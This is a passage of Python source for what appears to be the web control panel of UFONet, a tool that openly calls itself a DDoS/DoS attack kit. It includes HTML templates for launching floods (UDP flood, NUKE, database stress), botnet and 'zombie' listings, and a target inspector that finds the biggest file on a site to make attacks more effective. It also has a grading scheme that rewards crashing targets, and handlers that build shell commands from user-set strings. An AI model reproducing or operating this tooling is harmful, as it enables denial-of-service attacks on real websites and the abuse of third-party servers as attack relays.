  3198. <td align="left">* <a href="https://en.wikipedia.org/wiki/UDP_flood_attack" target="_blank">UFOUDP</a>:</td><td align="right"> <input type="text" name="ufoudp" id="ufoudp" size="4" placeholder="101"></td>
  3199. </tr><tr>
  3200. <td align="left">* <a href="https://dl.packetstormsecurity.net/papers/general/tcp-starvation.pdf" target="_blank">NUKE</a>:</td><td align="right"> <input type="text" name="nuke" id="nuke" size="4" placeholder="1001"></td>
  3201. </tr>
  3202. </table>
  3203. <hr>
  3204. * Set db stress parameter: <input type="text" name="dbstress" id="dbstress" size="22" placeholder="search.php?q=">
  3205. <hr></div>
  3206. <button title="Start to attack your target..." onClick=Start() style="color:yellow; height:40px; width:240px; font-weight:bold; background-color:red; border: 2px solid yellow;" id="attack_button">ATTACK!</button> | Total Botnet = <b><a href='javascript:runCommandX("cmd_list_army")'><font size='5'>"""+ self.total_botnet +"""</font></a></b></pre>
  3207. </td><td>
  3208. <table><tr><td><table><tr><td><img src='data:image/png;base64,"""+self.alien6_img+"""' onclick="Grid()"></td></tr><tr><td align="right"><a href="javascript:Grid()">GLOBAL.GRID</a></td></tr></table></td></tr><tr><td><table><tr><td><img src='data:image/png;base64,"""+self.alien8_img+"""' onclick="Wargames()"></td></tr><tr><td align="right"><a href="javascript:Wargames()">GLOBAL.WARGAMES</a></td></tr></table></td></tr></table>
  3209. </td></tr></table>
  3210. </td></tr></table>
  3211. <hr>
  3212. <div id="cmdOut"></div>
  3213. """ + self.pages["/footer"]
  3214. self.pages["/help"] = self.pages["/header"] + """<script language="javascript">
  3215. function show(one) {
  3216. var nb = document.getElementsByTagName("div");
  3217. for(var x=0; x<nb.length; x++) {
  3218. name = nb[x].getAttribute("class");
  3219. if (name == 'nb') {
  3220. if (nb[x].id == one) {
  3221. nb[x].style.display = 'block';
  3222. }
  3223. else {
  3224. nb[x].style.display = 'none';
  3225. }
  3226. }
  3227. }
  3228. }
  3229. </script>
  3230. <style>.container{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;}svg{max-width:8rem;}.masking{-webkit-transform: scale(0);transform:scale(0);-webkit-transform-origin:178px;transform-origin:178px;-webkit-animation: scale 3s linear infinite; animation: scale 3s linear infinite;}@-webkit-keyframes scale{80%{opacity: 1;}100%{-webkit-transform: scale(1);transform: scale(1);opacity: 0;}}@keyframes scale{80% {opacity: 1;}100%{-webkit-transform: scale(1);transform: scale(1);opacity: 0;}}</style>
  3231. </head>
  3232. <body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  3233. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  3234. <center>
  3235. <table cellpadding="38" cellspacing="38">
  3236. <tr>
  3237. <td>
  3238. <div class="ringMenu">
  3239. <ul>
  3240. <li class="main"><a href="help">Help</a></li>
  3241. <li class="top"><a href="botnet">Botnet</a></li>
  3242. <li class="right"><a href="inspect">Inspect</a></li>
  3243. <li class="bottom"><a href="attack">Attack</a></li>
  3244. <li class="left"><a href="gui">RETURN</a></li>
  3245. </ul>
  3246. </div>
  3247. </td>
  3248. <td>
  3249. <table cellpadding="24" cellspacing="25" border="1">
  3250. <tr>
  3251. <td>
  3252. <a href="javascript:alert('DAIALAFSÄ & LUÄRKS says: Hi! """ + self.ranking + """, The first steps are easy ... RTFM! ;-)');"><img src='data:image/png;base64,"""+self.aliens_img+"""'></a>
  3253. </td>
  3254. <td><pre>
  3255. <div><a id="mH1" href="javascript:show('nb1');" style="text-decoration: none;" >+ Project info</a></div>
  3256. <div class="nb" id="nb1" style="display: none;"> <b>UFONet</b> - is a set of tools designed to launch <a href="https://en.wikipedia.org/wiki/Distributed_denial-of-service" target="_blank">DDoS</a> and <a href="https://en.wikipedia.org/wiki/Denial-of-service_attack" target="_blank">DoS</a> attacks
  3257. and that allows to combine both in a single offensive.
  3258. </div><div><a id="mH2" href="javascript:show('nb2');" style="text-decoration: none;" >+ How does it work?</a></div> <div class="nb" id="nb2" style="display: none;"> You can read more info on next links:
  3259. - <a href="https://cwe.mitre.org/data/definitions/601.html" target="_blank">CWE-601:Open Redirect</a>
  3260. - <a href="https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2" target="_blank">OWASP:URL Redirector Abuse</a>
  3261. - <a href="https://ufonet.03c8.net/ufonet/ufonet-schema.png" target="_blank">UFONet:Botnet Schema</a></div> <div><a id="mH3" href="javascript:show('nb3');" style="text-decoration: none;" >+ How to start?</a></div> <div class="nb" id="nb3" style="display: none;"> All you need to start an attack is:
  3262. - a list of '<a href="https://en.wikipedia.org/wiki/Zombie" target="_blank">zombies</a>'; to conduct their connections to your target
  3263. - a place; to efficiently hit your target</div> <div><a id="mH4" href="javascript:show('nb4');" style="text-decoration: none;" >+ Updating</a></div><div class="nb" id="nb4" style="display: none;">
  3264. This feature can be used <u>ONLY</u> if you have cloned UFONet.
  3265. - <i>git clone <a href="https://code.03c8.net/epsylon/ufonet" target="_blank">https://code.03c8.net/epsylon/ufonet</a></i>
  3266. - <i>git clone <a href="https://github.com/epsylon/ufonet" target="_blank">https://github.com/epsylon/ufonet</a></i>
  3267. </div><div>
  3268. <a id="mH5" href="javascript:show('nb5');" style="text-decoration: none;" >+ FAQ/Issues?</a></div><div class="nb" id="nb5" style="display: none;">
  3269. If you have problems with UFONet, try to solve them following next links:
  3270. - <a href="https://ufonet.03c8.net/FAQ.html" target="_blank">Website FAQ</a> section
  3271. - UFONet <a href="https://github.com/epsylon/ufonet/issues" target="_blank">issues</a></div>
  3272. <div><a id="mH6" href="javascript:show('nb6');" style="text-decoration: none;" >+ How can help?</a></div> <div class="nb" id="nb6" style="display: none;"> - Testing; use the tool and search for possible bugs and new ideas
  3273. - Coding; you can try to develop more features
  3274. - Promoting; talk about UFONet on the internet, events, hacklabs, etc
  3275. - Donating; <a href="https://blockchain.info/address/19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw" target="_blank">bitcoin</a>, objects, support, love ;-)</div> <div><a id="mH7" href="javascript:show('nb7');" style="text-decoration: none" >+ Contact methods</a></div> <div class="nb" id="nb7" style="display: none;"> You can contact using:
  3276. - Email: <a href="mailto: epsylon@riseup.net">epsylon@riseup.net</a> [GPG:0xB8AC3776]
  3277. - <a target="_blank" href="wormhole">Wormhole</a>: irc.freenode.net / #ufonet
  3278. </div></td> </tr></table> </td></tr></table>
  3279. """ + self.pages["/footer"]
  3280. self.pages["/inspect"] = self.pages["/header"] + """<script language="javascript">
  3281. function Requests() {
  3282. var win_requests = window.open("requests","_blank","fullscreen=no, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  3283. }
  3284. function Abduction() {
  3285. var win_requests = window.open("abduction","_blank","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  3286. }
  3287. function Start(){
  3288. target=document.getElementById("target").value
  3289. String.prototype.startsWith = function(prefix){
  3290. return this.indexOf(prefix) === 0;
  3291. }
  3292. if(target.startsWith("http")){
  3293. params="target="+escape(target)
  3294. }else{
  3295. window.alert("You need to enter a valid url: http(s)://target.com/page.html");
  3296. return
  3297. }
  3298. runCommandX("cmd_inspect",params)
  3299. }
  3300. </script>
  3301. </head>
  3302. <body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  3303. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  3304. <center>
  3305. <table cellpadding="38" cellspacing="38">
  3306. <tr>
  3307. <td>
  3308. <div class="ringMenu">
  3309. <ul>
  3310. <li class="main"><a href="inspect">Inspect</a></li>
  3311. <li class="top"><a href="help">Help</a></li>
  3312. <li class="right"><a href="botnet">Botnet</a></li>
  3313. <li class="bottom"><a href="attack">Attack</a></li>
  3314. <li class="left"><a href="gui">RETURN</a></li>
  3315. </ul>
  3316. </div>
  3317. </td>
  3318. <td>
  3319. <table bgcolor="black" cellpadding="24" cellspacing="25" border="1">
  3320. <tr>
  3321. <td>
  3322. <pre>
  3323. This feature will provide you the biggest file on target.
  3324. You can use this before to attack to be more effective.
  3325. <button title="Configure how you will perform requests (proxy, HTTP headers, etc)..." onclick="Requests()">Configure requests</button>
  3326. <hr>
  3327. * Set page to crawl: <input type="text" name="target" id="target" size="30" placeholder="http(s)://target.com/list_videos.php">
  3328. <hr>
  3329. <button title="Start to search for biggest file on your target..." onClick=Start() style="color:yellow; height:40px; width:240px; font-weight:bold; background-color:red; border: 2px solid yellow;">INSPECT!</button></pre>
  3330. </td><td><table><tr><td><img src='data:image/png;base64,"""+self.alien7_img+"""' onclick="Abduction()"></td></tr><tr><td align="right"><a href="javascript:Abduction()">ABDUCTION!</a></td></tr></table></td>
  3331. </tr></table>
  3332. </td>
  3333. </tr>
  3334. </table>
  3335. <hr>
  3336. <div id="cmdOut"></div>
  3337. """ + self.pages["/footer"]
  3338. self.pages["/ranking"] = self.pages["/header"] + """<script language="javascript">
  3339. function Grid() {
  3340. var win_grid = window.open("grid","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  3341. }
  3342. function Stats() {
  3343. var win_stats = window.open("stats","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  3344. }
  3345. function Board() {
  3346. var win_board = window.open("board","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  3347. }
  3348. function Links() {
  3349. var win_links = window.open("links","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  3350. }
  3351. function Streams() {
  3352. var win_streams = window.open("streams","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  3353. }
  3354. function Sync_ranking(){
  3355. ranking_source=document.getElementById("ranking_source").value
  3356. if(ranking_source == "") {
  3357. window.alert("You need to enter a valid IP (with a 'blackhole' listening on).");
  3358. return
  3359. }else{
  3360. params="ranking_source="+escape(ranking_source)
  3361. runCommandX("cmd_refresh_ranking",params)
  3362. document.getElementById("nb1").style.display = "none";
  3363. document.getElementById("nb1").style.display = "block";
  3364. setTimeout("location.reload()", 10000)
  3365. }
  3366. }
  3367. </script></head>
  3368. <body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  3369. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  3370. <center>
  3371. <table bgcolor="black" cellpadding="24" cellspacing="25" border="0"><tr>
  3372. <td><a href="javascript:alert('Commander DPR says: I love new blood!! """ + self.ranking + """, in the Ranking section you can see information about how to raise your grade, meet the best UFOMasters, be close to those who are like you and try to find partners to dominate the multi-verse... Until then: Dont be evil!');"><img src='data:image/png;base64,"""+self.commander_img+"""'></a></td>
  3373. <td>GRADUATION/CLANS device: <font color='green'>ON</font><br><br><button title="Review stats from other motherships and share yours with them..." onclick="Grid()">VISIT GRID!</button> <button title="Visit your own stats..." onclick="Stats()">VISIT STATS!</button><br><br><button title="Visit board panel..." onclick="Board()">VISIT BOARD!</button> <button title="Visit data links..." onclick="Links()">VISIT LINKS!</button> <button title="Visit TV.streams..." onclick="Streams()">VISIT STREAMS!</button></td>
  3374. </tr></table>
  3375. <table cellpadding="5" cellspacing="10">
  3376. <tr>
  3377. <td align="center">
  3378. Your ranking is: <b>""" + str(self.ranking) + """</b>
  3379. </td>
  3380. </tr>
  3381. <tr>
  3382. <td>
  3383. <table border="1" cellpadding="10" cellspacing="10">
  3384. <tr>
  3385. <td align="center"><b><u>GRADE:</u></b></td><td align="center"><b><u>RANKING:</u></b></td><td align="center"><b><u>REQUIRED:</u></b></td></tr>
  3386. <tr>
  3387. <td align="center"><font color='orange' size='4'>-</font></td><td align="center"><font color='orange'>Unknown</font></td><td align='center'><a style="text-decoration:none" href="javascript:alert('You havent a correct key set on your configuration to unmask this Motherships!');">KEY?</a></td></tr>
  3388. <tr>
  3389. <td align="center"><font color='white' size='4'>*</font></td><td align="center"><font color='white'>Rookie</font></td><td align='center'><font color='white'>missions<4</font></td></tr>
  3390. <tr>
  3391. <td align="center"><font color='cyan' size='4'>**</font></td><td align="center"><font color='cyan'>Mercenary</font></td><td align='center'><font color='cyan'>missions>4</font></td></tr>
  3392. <tr>
  3393. <td align="center"><font color='blueviolet' size='4'>***</font></td><td align="center"><font color='blueviolet'>Bandit</font></td><td align='center'><font color='blueviolet'>crashed=1</font></td></tr>
  3394. <tr>
  3395. <td align="center"><font color='blue' size='4'>****</font></td><td align="center"><font color='blue'>UFOmmander!</font></td><td align='center'><font color='blue'>crashed>1<4</font></td></tr>
  3396. <tr>
  3397. <td align="center"><font color='red' size='4'>&#x25BC;</font></td><td align="center"><font color='red'>UFOl33t!</font></td><td align='center'><font color='red'><a style="text-decoration:none" href="javascript:alert('Secret Achievement!');">???</a></font></td></tr>
  3398. </table>
  3399. </td>
  3400. </tr></table>
  3401. <br>
  3402. <table cellpadding="5" cellspacing="10">
  3403. <tr>
  3404. <td>Blackhole/IP:</td>
  3405. <td><input type="text" name="ranking_source" id="ranking_source" size="20" value='"""+default_blackhole+"""'></td>
  3406. <td><button title="Syncronize data from a blackhole with your device..." onclick="Sync_ranking()">DOWNLOAD!</button></td>
  3407. </tr></table>
  3408. <br>
  3409. <div id="nb2" style="display: none;">"""+str(self.extract_ranking_table())+"""</div>
  3410. Last update: <font color='"""+ self.ranking_status_color + """'>"""+ self.ranking_datetime + """</font><br><br>
  3411. <div id="cmdOut"></div>
  3412. <div id="nb1" style="display: block;">"""+self.ranking_text+"""</div>
  3413. <table bgcolor="black" cellpadding="5" cellspacing="10" border="0"><tr>
  3414. <td>
  3415. </td><td>
  3416. <table border="1" cellpadding="5" cellspacing="10">
  3417. <tr>
  3418. <td align="center"><b><u>TOTAL_ON_GRID:</u></b></td><td align="center"><b><u>"""+str(self.ranking_grid_total)+"""</u></b></td></tr>
  3419. <tr>
  3420. <td align="center"><font color='orange'>Unknown</font></td><td align='center'><font color='orange'>"""+str(self.ranking_grid_unknown)+"""</font></td></tr>
  3421. <tr>
  3422. <td align="center"><font color='white'>Rookie</font></td><td align='center'><font color='white'>"""+str(self.ranking_grid_rookie)+"""</font></td></tr>
  3423. <tr>
  3424. <td align="center"><font color='cyan'>Mercenary</font></td><td align='center'><font color='cyan'>"""+str(self.ranking_grid_mercenary)+"""</font></td></tr>
  3425. <tr>
  3426. <td align="center"><font color='blueviolet'>Bandit</font></td><td align='center'><font color='blueviolet'>"""+str(self.ranking_grid_bandit)+"""</font></td></tr>
  3427. <tr>
  3428. <td align="center"><font color='blue'>UFOmmander!</font></td><td align='center'><font color='blue'>"""+str(self.ranking_grid_ufommander)+"""</font></td></tr>
  3429. <tr>
  3430. <td align="center"><font color='red'>UFOl33t!</font></td><td align='center'><font color='red'>"""+str(self.ranking_grid_ufoleet)+"""</font></td></tr>
  3431. </table>
  3432. </td><td>
  3433. <table border="1" cellpadding="5" cellspacing="10">
  3434. <tr>
  3435. <td><b><u>TOP_5_MOTHERSHIPS:</u></b></td></tr>
  3436. <tr>
  3437. <td align='center'>"""+str(self.ranking_top5_player1)+"""</td></tr>
  3438. <tr>
  3439. <td align='center'>"""+str(self.ranking_top5_player2)+"""</td></tr>
  3440. <tr>
  3441. <td align='center'>"""+str(self.ranking_top5_player3)+"""</td></tr>
  3442. <tr>
  3443. <td align='center'>"""+str(self.ranking_top5_player4)+"""</td></tr>
  3444. <tr>
  3445. <td align='center'>"""+str(self.ranking_top5_player5)+"""</td></tr>
  3446. </table>
  3447. </td><td>
  3448. <table border="1" cellpadding="5" cellspacing="10">
  3449. <tr>
  3450. <td><b><u>RANDOM_SIMILAR:</u></b></td></tr>
  3451. <tr>
  3452. <td align='center'>"""+str(self.ranking_similar_player1)+"""</td></tr>
  3453. <tr>
  3454. <td align='center'>"""+str(self.ranking_similar_player2)+"""</td></tr>
  3455. <tr>
  3456. <td align='center'>"""+str(self.ranking_similar_player3)+"""</td></tr>
  3457. </table>
  3458. </td><td>
  3459. <table border="1" cellpadding="5" cellspacing="10">
  3460. <tr>
  3461. <td><b><u>AI_SUGGESTION:</u></b></td></tr>
  3462. <tr>
  3463. <td align='center'>"""+str(self.ranking_top1_player1)+"""</td></tr>
  3464. </table>
  3465. </td>
  3466. </tr></table>
  3467. </center>
  3468. <hr>
  3469. """ + self.pages["/footer"]
  3470. self.pages["/lib.js"] = """function loadXMLDoc() {
  3471. var xmlhttp;
  3472. if (window.XMLHttpRequest) {
  3473. // code for IE7+, Firefox, Chrome, Opera, Safari
  3474. xmlhttp = new XMLHttpRequest();
  3475. } else {
  3476. // code for IE6, IE5
  3477. xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  3478. }
  3479. xmlhttp.onreadystatechange = function() {
  3480. if (xmlhttp.readyState == 4 ) {
  3481. if(xmlhttp.status == 200){
  3482. document.getElementById("cmdOut").innerHTML = xmlhttp.responseText;
  3483. setTimeout("loadXMLDoc()", 3000);
  3484. }
  3485. }
  3486. }
  3487. xmlhttp.send();
  3488. }
  3489. function runCommandX(cmd,params) {
  3490. var xmlhttp;
  3491. if (window.XMLHttpRequest) {
  3492. // code for IE7+, Firefox, Chrome, Opera, Safari
  3493. xmlhttp = new XMLHttpRequest();
  3494. } else {
  3495. // code for IE6, IE5
  3496. xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  3497. }
  3498. xmlhttp.onreadystatechange = function() {
  3499. if (xmlhttp.readyState == 4 ) {
  3500. if(xmlhttp.status == 200){
  3501. if(cmd.indexOf("?")!=-1){
  3502. s=cmd.split("?")
  3503. cmd=s[0]
  3504. params=s[1]
  3505. }
  3506. document.getElementById("cmdOut").innerHTML = xmlhttp.responseText;
  3507. //document.getElementById("cmdOut").scrollIntoView();
  3508. newcmd=cmd
  3509. if(newcmd=="cmd_list_army"||newcmd=="cmd_view_army"||newcmd=="cmd_list_zombies"||newcmd=="cmd_list_aliens"|| newcmd=="cmd_list_droids"||newcmd=="cmd_list_ucavs"||newcmd=="cmd_list_rpcs"||newcmd=="cmd_view_changelog"){ //do not refresh listing army
  3510. return;
  3511. } else {
  3512. if(newcmd=="cmd_test_army" || newcmd=="cmd_test_all" || newcmd=="cmd_test_offline" || newcmd=="cmd_test_rpcs" || newcmd=="cmd_attack" || newcmd=="cmd_refresh_blackholes" || newcmd=="cmd_refresh_news" || newcmd=="cmd_refresh_missions" || newcmd=="cmd_sync_grid" || newcmd=="cmd_sync_board" || newcmd=="cmd_sync_wargames" || newcmd=="cmd_sync_links" || newcmd=="cmd_sync_globalnet" || newcmd=="cmd_sync_streams" || newcmd=="cmd_send_message_board" || newcmd=="cmd_transfer_grid" || newcmd=="cmd_transfer_wargame" || newcmd=="cmd_transfer_link" || newcmd=="cmd_transfer_globalnet" || newcmd=="cmd_transfer_stream" || newcmd=="cmd_decrypt" || newcmd=="cmd_decrypt_moderator_board" || newcmd=="cmd_decrypt_grid" || newcmd=="cmd_decrypt_wargames" || newcmd=="cmd_decrypt_links" || newcmd=="cmd_decrypt_globalnet" || newcmd=="cmd_decrypt_streams" || newcmd=="cmd_inspect" || newcmd=="cmd_abduction" || newcmd=="cmd_download_community" || newcmd=="cmd_upload_community" || newcmd=="cmd_attack_me" || newcmd=="cmd_check_tool" || newcmd=="cmd_edit_supply" || newcmd=="cmd_job_remove" || newcmd=="cmd_job_remove_all" || newcmd=="cmd_job_add" || newcmd =="cmd_job_add_all" || newcmd=="cmd_job_cancel" || newcmd=="cmd_job_cancel_all" || newcmd=="cmd_job_filter" || newcmd=="cmd_link_filter" || newcmd=="cmd_globalnet_filter" || newcmd=="cmd_stream_filter" || newcmd=="cmd_grid_filter" || newcmd=="cmd_search") newcmd=newcmd+"_update"
  3513. //do not refresh if certain text on response is found
  3514. if(newcmd.match(/update/) &&
  3515. (
  3516. xmlhttp.responseText.match(/Generating random exit/) ||
  3517. xmlhttp.responseText.match(/Biggest File/) ||
  3518. xmlhttp.responseText.match(/Abduction finished/) ||
  3519. xmlhttp.responseText.match(/Not any zombie active/) ||
  3520. xmlhttp.responseText.match(/Target looks OFFLINE/) ||
  3521. xmlhttp.responseText.match(/Unable to connect to target/) ||
  3522. xmlhttp.responseText.match(/Something wrong/) ||
  3523. xmlhttp.responseText.match(/Target url not valid/) ||
  3524. xmlhttp.responseText.match(/updated/) ||
  3525. xmlhttp.responseText.match(/For HELP use:/) ||
  3526. xmlhttp.responseText.match(/Not any .git repository found/) ||
  3527. xmlhttp.responseText.match(/End of /) ||
  3528. xmlhttp.responseText.match(/Exiting /) ||
  3529. xmlhttp.responseText.match(/Bye/)
  3530. )
  3531. ) return;
  3532. setTimeout(function(){runCommandX(newcmd,params)}, 3000);
  3533. return;}
  3534. }
  3535. }
  3536. }
  3537. if(typeof params != "undefined") cmd=cmd+"?"+params
  3538. xmlhttp.open("GET", cmd, true);
  3539. xmlhttp.send();
  3540. }
  3541. """
  3542. self.pages["/requests"] = self.html_requests()
  3543. self.pages["/board_profile"] = self.html_board_profile()
  3544. self.pages["/grid_profile"] = self.html_grid_profile()
  3545. def buildGetParams(self, request):
  3546. params = {}
  3547. try:
  3548. path = re.findall("^GET ([^\s]+)", request.decode('utf-8'))
  3549. except:
  3550. path = re.findall("^GET ([^\s]+)", request)
  3551. if path:
  3552. path = path[0]
  3553. start = path.find("?")
  3554. if start != -1:
  3555. if path[start+1:start+7] == "zombie":
  3556. params['zombie']=path[start+8:]
  3557. return params
  3558. if path[start+1:start+7] == "target":
  3559. params['target']=path[start+8:]
  3560. return params
  3561. for param in path[start+1:].split("&"):
  3562. f = param.split("=")
  3563. if len(f) == 2:
  3564. var = f[0]
  3565. value = f[1]
  3566. value = value.replace("+", " ")
  3567. value = urllib.parse.unquote(value)
  3568. params[var] = value
  3569. return params
  3570. def save_profile(self,pGet):
  3571. # set values for profile configuration from html form to json file
  3572. if "profile_token" in list(pGet.keys()):
  3573. profile_token = pGet["profile_token"]
  3574. else:
  3575. profile_token = self.profile_token
  3576. if "profile_icon" in list(pGet.keys()):
  3577. profile_icon = pGet["profile_icon"]
  3578. else:
  3579. profile_icon = self.profile_icon
  3580. if "profile_nick" in list(pGet.keys()):
  3581. profile_nick = pGet["profile_nick"]
  3582. else:
  3583. profile_nick = self.profile_nick
  3584. # set new values on boardcfg json file
  3585. with open(self.mothership_boardcfg_file, "w") as f:
  3586. json.dump({"profile_token": profile_token, "profile_icon": profile_icon, "profile_nick": profile_nick}, f, indent=4)
  3587. def save_grid(self,pGet):
  3588. # set values for profile configuration from html form to json file
  3589. if "grid_token" in list(pGet.keys()):
  3590. grid_token = pGet["grid_token"]
  3591. else:
  3592. grid_token = self.grid_token
  3593. if "grid_contact" in list(pGet.keys()):
  3594. grid_contact = pGet["grid_contact"]
  3595. else:
  3596. grid_contact = self.grid_contact
  3597. if "grid_nick" in list(pGet.keys()):
  3598. grid_nick = pGet["grid_nick"]
  3599. else:
  3600. grid_nick = self.grid_nick
  3601. # set new values on gridcfg json file
  3602. with open(self.mothership_gridcfg_file, "w") as f:
  3603. json.dump({"grid_token": grid_token, "grid_contact": grid_contact, "grid_nick": grid_nick}, f, indent=4)
  3604. def save_cfg(self,pGet):
  3605. # set values for requests configuration from html form to json file
  3606. if "rproxy" in list(pGet.keys()):
  3607. frm_rproxy = pGet["rproxy"]
  3608. else:
  3609. frm_rproxy = self.rproxy
  3610. if "ruseragent" in list(pGet.keys()):
  3611. frm_ruseragent = pGet["ruseragent"]
  3612. else:
  3613. frm_ruseragent = self.ruseragent
  3614. if "rreferer" in list(pGet.keys()):
  3615. frm_rreferer = pGet["rreferer"]
  3616. else:
  3617. frm_rreferer = self.rreferer
  3618. if "rhost" in list(pGet.keys()):
  3619. frm_rhost = pGet["rhost"]
  3620. else:
  3621. frm_rhost = self.rhost
  3622. if "rxforw" in list(pGet.keys()):
  3623. frm_rxforw = pGet["rxforw"]
  3624. else:
  3625. if "update" in list(pGet.keys()):
  3626. frm_rxforw = ""
  3627. else:
  3628. frm_rxforw = self.rxforw
  3629. if "rxclient" in list(pGet.keys()):
  3630. frm_rxclient = pGet["rxclient"]
  3631. else:
  3632. if "update" in list(pGet.keys()):
  3633. frm_rxclient = ""
  3634. else:
  3635. frm_rxclient = self.rxclient
  3636. if "rtimeout" in list(pGet.keys()):
  3637. frm_rtimeout = pGet["rtimeout"]
  3638. else:
  3639. frm_rtimeout = self.rtimeout
  3640. if "rretries" in list(pGet.keys()):
  3641. frm_rretries = pGet["rretries"]
  3642. else:
  3643. frm_rretries = self.rretries
  3644. if "rdelay" in list(pGet.keys()):
  3645. frm_rdelay = pGet["rdelay"]
  3646. else:
  3647. frm_rdelay = self.rdelay
  3648. if "threads" in list(pGet.keys()):
  3649. frm_threads = pGet["threads"]
  3650. else:
  3651. frm_threads = self.threads
  3652. if "rssl" in list(pGet.keys()):
  3653. frm_rssl = pGet["rssl"]
  3654. else:
  3655. if "update" in list(pGet.keys()):
  3656. frm_rssl = ""
  3657. else:
  3658. frm_rssl = self.rssl
  3659. # set new values on webcfg json file
  3660. with open(self.mothership_webcfg_file, "w") as f:
  3661. json.dump({"rproxy": frm_rproxy, "ruseragent": frm_ruseragent, "rreferer": frm_rreferer, "rhost": frm_rhost, "rxforw": frm_rxforw, "rxclient": frm_rxclient, "rtimeout": frm_rtimeout, "rretries": frm_rretries, "rdelay": frm_rdelay, "threads":frm_threads, "rssl":frm_rssl}, f, indent=4)
  3662. def get(self, request):
  3663. # set request options of the user
  3664. cmd_options = "--proxy='" + self.rproxy + "' --user-agent='" + self.ruseragent + "' --referer='" + self.rreferer + "' --host='" + self.rhost + "' --timeout='" + self.rtimeout + "' --retries='" + self.rretries + "' --delay='" + self.rdelay +"'" + " --threads='"+self.threads+"'"
  3665. if self.rxforw == "on":
  3666. cmd_options = cmd_options + " --xforw"
  3667. if self.rxclient == "on":
  3668. cmd_options = cmd_options + " --xclient"
  3669. if self.rssl == "on":
  3670. cmd_options = cmd_options + " --force-ssl"
  3671. cmd_options = cmd_options + " --force-yes" # no raw_input allowed on webgui
  3672. runcmd = ""
  3673. try:
  3674. res = re.findall("^GET ([^\s]+)", request.decode('utf-8'))
  3675. except:
  3676. res = re.findall("^GET ([^\s]+)", request)
  3677. if res is None or len(res)==0:
  3678. return
  3679. pGet = {}
  3680. page = res[0]
  3681. paramStart = page.find("?")
  3682. if paramStart != -1:
  3683. page = page[:paramStart]
  3684. try:
  3685. pGet = self.buildGetParams(request.decode('utf-8'))
  3686. except:
  3687. pGet = self.buildGetParams(request)
  3688. if page.startswith("/js/") or page.startswith("/images/") or page.startswith("/maps/") or page.startswith("/markers/"):
  3689. if os.path.exists("core/"+page[1:]):
  3690. try:
  3691. f=open("core/"+page[1:],'r',encoding="utf-8")
  3692. data = f.read()
  3693. self.pages[page]=data
  3694. except:
  3695. f=open("core/"+page[1:],'rb') # ajax map related
  3696. data = f.read()
  3697. self.pages[page]=data
  3698. elif page == "/js/ajax.js":
  3699. from .ajaxmap import AjaxMap
  3700. self.pages[page] = AjaxMap().ajax(pGet)
  3701. if page == "/cmd_check_tool":
  3702. self.pages["/cmd_check_tool"] = "<pre>Waiting for updates results...</pre>"
  3703. runcmd = "("+python_version+" -i ufonet --update |tee /tmp/out) &"
  3704. if page == "/cmd_check_tool_update":
  3705. if not os.path.exists('/tmp/out'):
  3706. open('/tmp/out', 'w').close()
  3707. with open('/tmp/out', 'r') as f:
  3708. self.pages["/cmd_check_tool_update"] = "<pre>"+f.read()+"<pre>"
  3709. if page == "/cmd_view_changelog":
  3710. f = open("docs/VERSION", "r")
  3711. changelog = f.read()
  3712. f.close()
  3713. self.pages["/cmd_view_changelog"] = "</center><pre>"+str(changelog)+"<br /><br/>"
  3714. if page == "/cmd_list_army":
  3715. self.pages["/cmd_list_army"] = "<pre><h1>Total Botnet = "+self.total_botnet+"</h1><table cellpadding='10' cellspacing='10' border='1'><tr><td>UCAVs:</td><td>"+self.num_ucavs+"</td><td>Aliens:</td><td>"+self.num_aliens+"</td></tr><tr><td>Droids:</td><td>"+self.num_droids+"</td><td>Zombies:</td><td>"+self.num_zombies+"</td></tr><tr><td>XML-RPCs:</td><td>"+self.num_rpcs+" </td><td>NTPs:</td><td>"+self.num_ntps+"</td></tr><tr><td>DNSs:</td><td>"+self.num_dnss+"</td><td>SNMPs:</td><td>"+self.num_snmps+"</td></tr></table> <hr><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>UCAVs:</u> <b>"+self.num_ucavs+"</b></td><td>Last update: <u>"+time.ctime(os.path.getctime(self.ucavs_file))+"</u></td></tr><tr><td>"+'\n'.join(self.list_ucavs)+"</td><td></h3>"+'\n'.join(self.ucavs)+"</td></tr></table><br /><table border='1' cellpadding='10' cellspacing='10'><tr><td><h3><u>Aliens:</u> <b>"+self.num_aliens+"</b></td><td>Last update: 